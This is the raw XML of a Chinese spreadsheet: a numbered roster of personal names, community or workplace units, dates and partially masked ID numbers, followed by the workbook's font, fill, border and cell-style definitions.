  <si>
    <t>2563</t>
  </si>
  <si>
    <t>郭雅宁</t>
  </si>
  <si>
    <t>411326********0720</t>
  </si>
  <si>
    <t>2564</t>
  </si>
  <si>
    <t>张建武</t>
  </si>
  <si>
    <t>2565</t>
  </si>
  <si>
    <t>郭桂香</t>
  </si>
  <si>
    <t>412921********0728</t>
  </si>
  <si>
    <t>2566</t>
  </si>
  <si>
    <t>刘春焕</t>
  </si>
  <si>
    <t>411326********0762</t>
  </si>
  <si>
    <t>2567</t>
  </si>
  <si>
    <t>邓佼</t>
  </si>
  <si>
    <t>411326********0719</t>
  </si>
  <si>
    <t>2568</t>
  </si>
  <si>
    <t>2569</t>
  </si>
  <si>
    <t>陈玉芬</t>
  </si>
  <si>
    <t>412921********0743</t>
  </si>
  <si>
    <t>2570</t>
  </si>
  <si>
    <t>邢嘉轩</t>
  </si>
  <si>
    <t>411321********0037</t>
  </si>
  <si>
    <t>2571</t>
  </si>
  <si>
    <t>张荣焕</t>
  </si>
  <si>
    <t>2572</t>
  </si>
  <si>
    <t>张富敏</t>
  </si>
  <si>
    <t>2573</t>
  </si>
  <si>
    <t>史春花</t>
  </si>
  <si>
    <t>2574</t>
  </si>
  <si>
    <t>张淑芳</t>
  </si>
  <si>
    <t>2575</t>
  </si>
  <si>
    <t>李宗刚</t>
  </si>
  <si>
    <t>412921********0773</t>
  </si>
  <si>
    <t>2576</t>
  </si>
  <si>
    <t>邱桂芝</t>
  </si>
  <si>
    <t>2577</t>
  </si>
  <si>
    <t>李鹊</t>
  </si>
  <si>
    <t>2578</t>
  </si>
  <si>
    <t>唐山林</t>
  </si>
  <si>
    <t>2579</t>
  </si>
  <si>
    <t>常杰勤</t>
  </si>
  <si>
    <t>2580</t>
  </si>
  <si>
    <t>勾长雪</t>
  </si>
  <si>
    <t>2581</t>
  </si>
  <si>
    <t>李学敏</t>
  </si>
  <si>
    <t>412921********2828</t>
  </si>
  <si>
    <t>2582</t>
  </si>
  <si>
    <t>关明慧</t>
  </si>
  <si>
    <t>411326********2087</t>
  </si>
  <si>
    <t>2583</t>
  </si>
  <si>
    <t>翟秀敏</t>
  </si>
  <si>
    <t>2584</t>
  </si>
  <si>
    <t>向东厂社区</t>
  </si>
  <si>
    <t>欧阳瑞昱</t>
  </si>
  <si>
    <t>2585</t>
  </si>
  <si>
    <t>刘尚钦</t>
  </si>
  <si>
    <t>2586</t>
  </si>
  <si>
    <t>郭建荣</t>
  </si>
  <si>
    <t>412924********0380</t>
  </si>
  <si>
    <t>2587</t>
  </si>
  <si>
    <t>张智皓</t>
  </si>
  <si>
    <t>411321********2010</t>
  </si>
  <si>
    <t>2024年7月</t>
  </si>
  <si>
    <t>2588</t>
  </si>
  <si>
    <t>孟令浩</t>
  </si>
  <si>
    <t>2589</t>
  </si>
  <si>
    <t>王嘉丽</t>
  </si>
  <si>
    <t>2590</t>
  </si>
  <si>
    <t>蔡昆朔</t>
  </si>
  <si>
    <t>411321********0376</t>
  </si>
  <si>
    <t>2591</t>
  </si>
  <si>
    <t>王英涵</t>
  </si>
  <si>
    <t>411321********6302</t>
  </si>
  <si>
    <t>2592</t>
  </si>
  <si>
    <t>凌佳如</t>
  </si>
  <si>
    <t>2593</t>
  </si>
  <si>
    <t>王中付</t>
  </si>
  <si>
    <t>412921********113X</t>
  </si>
  <si>
    <t>2594</t>
  </si>
  <si>
    <t>尹琮凯</t>
  </si>
  <si>
    <t>2595</t>
  </si>
  <si>
    <t>李岱</t>
  </si>
  <si>
    <t>2596</t>
  </si>
  <si>
    <t>高子涵</t>
  </si>
  <si>
    <t>411321********1521</t>
  </si>
  <si>
    <t>2597</t>
  </si>
  <si>
    <t>高子健</t>
  </si>
  <si>
    <t>411321********1518</t>
  </si>
  <si>
    <t>2598</t>
  </si>
  <si>
    <t>宋卫安</t>
  </si>
  <si>
    <t>2599</t>
  </si>
  <si>
    <t>张东阳</t>
  </si>
  <si>
    <t>2600</t>
  </si>
  <si>
    <t>杨玉香</t>
  </si>
  <si>
    <t>2601</t>
  </si>
  <si>
    <t>张汉发</t>
  </si>
  <si>
    <t>2602</t>
  </si>
  <si>
    <t>曹东升</t>
  </si>
  <si>
    <t>2603</t>
  </si>
  <si>
    <t>西北</t>
  </si>
  <si>
    <t>冯天改</t>
  </si>
  <si>
    <t>2604</t>
  </si>
  <si>
    <t>席云华</t>
  </si>
  <si>
    <t>2605</t>
  </si>
  <si>
    <t>郭鹏宇</t>
  </si>
  <si>
    <t>2606</t>
  </si>
  <si>
    <t>郭鹏菲</t>
  </si>
  <si>
    <t>411321********5145</t>
  </si>
  <si>
    <t>2607</t>
  </si>
  <si>
    <t>张玉</t>
  </si>
  <si>
    <t>411326********042X</t>
  </si>
  <si>
    <t>2608</t>
  </si>
  <si>
    <t>任保梅</t>
  </si>
  <si>
    <t>2609</t>
  </si>
  <si>
    <t>张晓红</t>
  </si>
  <si>
    <t>4113210706</t>
  </si>
  <si>
    <t>2610</t>
  </si>
  <si>
    <t>张恒源</t>
  </si>
  <si>
    <t>411321********1531</t>
  </si>
  <si>
    <t>2611</t>
  </si>
  <si>
    <t>大关居委会（麻绢厂）</t>
  </si>
  <si>
    <t>高英献</t>
  </si>
  <si>
    <t>2612</t>
  </si>
  <si>
    <t>郑怀春</t>
  </si>
  <si>
    <t>2025年7月</t>
  </si>
  <si>
    <t>2613</t>
  </si>
  <si>
    <t>马全旗</t>
  </si>
  <si>
    <t>2614</t>
  </si>
  <si>
    <t>赵振杰</t>
  </si>
  <si>
    <t>2615</t>
  </si>
  <si>
    <t>华祖平</t>
  </si>
  <si>
    <t>2616</t>
  </si>
  <si>
    <t>宏扬居委会</t>
  </si>
  <si>
    <t>曹喜三</t>
  </si>
  <si>
    <t>2617</t>
  </si>
  <si>
    <t>盆尧村居民组</t>
  </si>
  <si>
    <t>2618</t>
  </si>
  <si>
    <t>王小九</t>
  </si>
  <si>
    <t>2619</t>
  </si>
  <si>
    <t>杨茂玲</t>
  </si>
  <si>
    <t>2620</t>
  </si>
  <si>
    <t>王明朝</t>
  </si>
  <si>
    <t>2621</t>
  </si>
  <si>
    <t>杨树忠</t>
  </si>
  <si>
    <t>2622</t>
  </si>
  <si>
    <t>大关居委会      （云阳镇初中家属院）</t>
  </si>
  <si>
    <t>岳崇</t>
  </si>
  <si>
    <t>2623</t>
  </si>
  <si>
    <t>王圆庚</t>
  </si>
  <si>
    <t>411321********1513</t>
  </si>
  <si>
    <t>2624</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>南召店村</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>（河东所集体户）</t>
    </r>
  </si>
  <si>
    <t>张爱佳</t>
  </si>
  <si>
    <t>411321********0341</t>
  </si>
  <si>
    <t>2625</t>
  </si>
  <si>
    <t>邢远东</t>
  </si>
  <si>
    <t>412921********0058</t>
  </si>
  <si>
    <t>2626</t>
  </si>
  <si>
    <t>居委会</t>
  </si>
  <si>
    <t>杨刚</t>
  </si>
  <si>
    <t>411321101203</t>
  </si>
  <si>
    <t>2627</t>
  </si>
  <si>
    <t>电线厂（中华社区办理）</t>
  </si>
  <si>
    <t>王志伟</t>
  </si>
  <si>
    <t>2628</t>
  </si>
  <si>
    <t>中华三组</t>
  </si>
  <si>
    <t>袁可</t>
  </si>
  <si>
    <t>2629</t>
  </si>
  <si>
    <t>镇政府</t>
  </si>
  <si>
    <t>王阁</t>
  </si>
  <si>
    <t>412921********4540</t>
  </si>
  <si>
    <t>2630</t>
  </si>
  <si>
    <t>张雅姿</t>
  </si>
  <si>
    <t>411321********442X</t>
  </si>
  <si>
    <t>2631</t>
  </si>
  <si>
    <t>城关镇政府（西北社区办理）</t>
  </si>
  <si>
    <t>张景</t>
  </si>
  <si>
    <t>2632</t>
  </si>
  <si>
    <t>李春照</t>
  </si>
  <si>
    <t>2633</t>
  </si>
  <si>
    <t>孙晓广</t>
  </si>
  <si>
    <t>411326********0039</t>
  </si>
  <si>
    <t>2634</t>
  </si>
  <si>
    <t>陈平</t>
  </si>
  <si>
    <t>2635</t>
  </si>
  <si>
    <t>中心校</t>
  </si>
  <si>
    <t>吴俊泽</t>
  </si>
  <si>
    <t>411321********0117</t>
  </si>
  <si>
    <t>4113211499</t>
  </si>
  <si>
    <t>2636</t>
  </si>
  <si>
    <t>吴博润</t>
  </si>
  <si>
    <t>411321********5947</t>
  </si>
  <si>
    <t>2637</t>
  </si>
  <si>
    <t>张靖皓</t>
  </si>
  <si>
    <t>411321********5599</t>
  </si>
  <si>
    <t>2638</t>
  </si>
  <si>
    <t>古运甫</t>
  </si>
  <si>
    <t>2639</t>
  </si>
  <si>
    <t>靳德洪</t>
  </si>
  <si>
    <t>2640</t>
  </si>
  <si>
    <t>外贸局（西北办理）</t>
  </si>
  <si>
    <t>朱培培</t>
  </si>
  <si>
    <t>2641</t>
  </si>
  <si>
    <t>2642</t>
  </si>
  <si>
    <t>郑长青</t>
  </si>
  <si>
    <t>2643</t>
  </si>
  <si>
    <t>宋熤煊</t>
  </si>
  <si>
    <t>411321********0202</t>
  </si>
  <si>
    <t>2644</t>
  </si>
  <si>
    <t>宋家锐</t>
  </si>
  <si>
    <t>411321********001X</t>
  </si>
  <si>
    <t>2645</t>
  </si>
  <si>
    <t>宁小芳</t>
  </si>
  <si>
    <t>412921********1907</t>
  </si>
  <si>
    <t>2646</t>
  </si>
  <si>
    <t>2647</t>
  </si>
  <si>
    <t>王峥晨</t>
  </si>
  <si>
    <t>411326********2013</t>
  </si>
  <si>
    <t>2648</t>
  </si>
  <si>
    <t>孙亚洲</t>
  </si>
  <si>
    <t>2649</t>
  </si>
  <si>
    <t>贝亚非</t>
  </si>
  <si>
    <t>2650</t>
  </si>
  <si>
    <t>马庆坤</t>
  </si>
  <si>
    <t>2651</t>
  </si>
  <si>
    <t>董志德</t>
  </si>
  <si>
    <t>412921********0110</t>
  </si>
  <si>
    <t>2652</t>
  </si>
  <si>
    <t>任付玲</t>
  </si>
  <si>
    <t>2653</t>
  </si>
  <si>
    <t>南河店镇供销社</t>
  </si>
  <si>
    <t>李金秋</t>
  </si>
  <si>
    <t>412921********3627</t>
  </si>
  <si>
    <t>2654</t>
  </si>
  <si>
    <t>闫玉莹</t>
  </si>
  <si>
    <t>412921********5865</t>
  </si>
  <si>
    <t>2655</t>
  </si>
  <si>
    <t>乔可欣</t>
  </si>
  <si>
    <t>411321********0265</t>
  </si>
  <si>
    <t>2656</t>
  </si>
  <si>
    <t>赵玉克</t>
  </si>
  <si>
    <t>412921********4851</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</si>
</sst>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53">
    <font>
      <sz val="12"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="14"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="11"/>
      <color theme="1"/>
      <name val="宋体"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="12"/>
      <color rgb="FF000000"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="11"/>
      <color rgb="FF000000"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="12"/>
      <color theme="1"/>
      <name val="宋体"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="10"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="20"/>
      <color rgb="FF000000"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="12"/>
      <color rgb="FF000000"/>
      <name val="宋体"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="12"/>
      <color rgb="FFFF0000"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="12"/>
      <color indexed="8"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="11"/>
      <color indexed="0"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="11"/>
      <color indexed="8"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="12"/>
      <color indexed="0"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="12"/>
      <color indexed="8"/>
      <name val="宋体"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="11"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="11"/>
      <color indexed="8"/>
      <name val="宋体"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="12"/>
      <color rgb="FF000000"/>
      <name val="Calibri"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="10"/>
      <color rgb="FF000000"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="10"/>
      <color rgb="FF000000"/>
      <name val="宋体"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="12"/>
      <name val="宋体"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="12"/>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9"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="11"/>
      <color indexed="20"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="13"/>
      <color indexed="56"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color indexed="56"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color indexed="63"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="11"/>
      <color indexed="60"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="15"/>
      <color indexed="56"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="11"/>
      <color indexed="10"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="18"/>
      <color indexed="56"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="11"/>
      <color indexed="62"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="12"/>
      <name val="Times New Roman"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="8"/>
      <color theme="1"/>
      <name val="宋体"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
  </fonts>
  <fills count="53">
    <fill>
      <patternFill patternType="none"/>
    </fill>
    <fill>
      <patternFill patternType="gray125"/>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor theme="4" tint="0.6"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFFFFFFF"/>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31"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor indexed="44"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor indexed="27"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor indexed="11"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor indexed="42"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor indexed="29"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor indexed="46"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor indexed="45"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor indexed="47"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor indexed="20"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor indexed="30"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor indexed="51"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor indexed="26"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor indexed="49"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor indexed="22"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor indexed="52"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor indexed="43"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
  </fills>
  <borders count="2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indexed="8"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="thin">
        <color rgb="FF000000"/>
      </left>
      <right style="thin">
        <color rgb="FF000000"/>
      </right>
      <top style="thin">
        <color rgb="FF000000"/>
      </top>
      <bottom style="thin">
        <color rgb="FF000000"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left/>
      <right style="thin">
        <color auto="1"/>
      </right>
      <top style="thin">
        <color auto="1"/>
      </top>
      <bottom style="thin">
        <color auto="1"/>
      </bottom>
      <diagonal/>
    </border>
    <border>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style="thin">
        <color indexed="22"/>
      </left>
      <right style="thin">
        <color indexed="22"/>
      </right>
      <top style="thin">
        <color indexed="22"/>
      </top>
      <bottom style="thin">
        <color indexed="22"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left/>
      <right/>
      <top/>
      <bottom style="thick">
        <color indexed="22"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left/>
      <right/>
      <top/>
      <bottom style="medium">
        <color indexed="30"/>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style="thin">
        <color indexed="23"/>
      </left>
      <right style="thin">
        <color indexed="23"/>
      </right>
      <top style="thin">
        <color indexed="23"/>
      </top>
      <bottom style="thin">
        <color indexed="23"/>
      </bottom>
      <diagonal/>
    </border>
  </borders>
  <cellStyleXfs count="92">
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="43" fontId="2" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="44" fontId="2" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="9" fontId="2" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="41" fontId="2" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="42" fontId="2" fillId="0" borderId="0" applyFon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 fillId="5" borderId="11" applyNumberFormat="0" applyFont="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12" applyNumberFormat="0" applyFill="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="0" borderId="12" applyNumberFormat="0" applyFill="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="29" fillId="0" borderId="13" applyNumberFormat="0" applyFill="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="29" fillId="0" borderId="0" applyNumberFormat="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="30" fillId="6" borderId="14" applyNumberFormat="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="31" fillId="7" borderId="15" applyNumberFormat="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="32" fillId="7" borderId="14" applyNumberFormat="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="33" fillId="8" borderId="16" applyNumberFormat="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="34" fillId="0" borderId="17" applyNumberFormat="0" applyFill="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="35" fillId="0" borderId="18" applyNumberFormat="0" applyFill="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="36" fillId="9" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="37" fillId="10" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="38" fillId="11" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="39" fillId="12" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="40" fillId="13" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="40" fillId="14" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="39" fillId="15" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="39" fillId="16" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="40" fillId="17" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="40" fillId="18" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="39" fillId="19" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="39" fillId="20" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="40" fillId="21" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="40" fillId="22" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="39" fillId="23" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="39" fillId="24" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="40" fillId="25" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="40" fillId="26" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="39" fillId="27" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="39" fillId="28" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="40" fillId="29" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="40" fillId="30" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="39" fillId="31" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="39" fillId="32" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="40" fillId="33" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="40" fillId="34" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="39" fillId="35" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="12" fillId="36" borderId="0" applyNumberFormat="0" applyBorder="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="12" fillId="37" borderId="0" applyNumberFormat="0" applyBorder="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="12" fillId="38" borderId="0" applyNumberFormat="0" applyBorder="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="12" fillId="39" borderId="0" applyNumberFormat="0" applyBorder="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="12" fillId="40" borderId="0" applyNumberFormat="0" applyBorder="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="12" fillId="41" borderId="0" applyNumberFormat="0" applyBorder="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="12" fillId="42" borderId="0" applyNumberFormat="0" applyBorder="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="12" fillId="43" borderId="0" applyNumberFormat="0" applyBorder="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="12" fillId="44" borderId="0" applyNumberFormat="0" applyBorder="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="41" fillId="45" borderId="0" applyNumberFormat="0" applyBorder="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="41" fillId="46" borderId="0" applyNumberFormat="0" applyBorder="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="12" fillId="47" borderId="0" applyNumberFormat="0" applyBorder="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="42" fillId="43" borderId="0" applyNumberFormat="0" applyBorder="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="48" borderId="19" applyNumberFormat="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="41" fillId="41" borderId="0" applyNumberFormat="0" applyBorder="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="43" fillId="0" borderId="20" applyNumberFormat="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="41" fillId="39" borderId="0" applyNumberFormat="0" applyBorder="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="41" fillId="49" borderId="0" applyNumberFormat="0" applyBorder="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="44" fillId="0" borderId="21" applyNumberFormat="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="45" fillId="50" borderId="22"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41" fillId="51" borderId="0" applyNumberFormat="0" applyBorder="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="46" fillId="52" borderId="0" applyNumberFormat="0" applyBorder="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="47" fillId="0" borderId="23" applyNumberFormat="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="48" fillId="0" borderId="0" applyNumberFormat="0" applyBorder="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="12" fillId="0" borderId="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="49" fillId="0" borderId="0" applyNumberFormat="0" applyBorder="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
